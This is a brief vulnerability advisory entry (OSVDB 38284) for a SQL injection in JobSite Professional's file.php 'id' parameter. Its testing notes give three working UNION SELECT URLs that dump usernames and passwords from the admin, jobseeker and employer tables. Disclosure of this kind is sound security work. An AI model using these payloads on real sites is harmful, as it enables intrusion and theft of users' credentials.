JobSite Professional file.php id Variable SQL Injection

2007-10-29T00:00:00
ID OSVDB:38284
Type osvdb
Reporter OSVDB
Modified 2007-10-29T00:00:00

Description

Manual Testing Notes

http://[target]/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_admin_users/
http://[target]/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_ext_jobseekers/
http://[target]/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_ext_employers/*

References:

Secunia Advisory ID:27443
Other Advisory URL: http://milw0rm.com/exploits/4576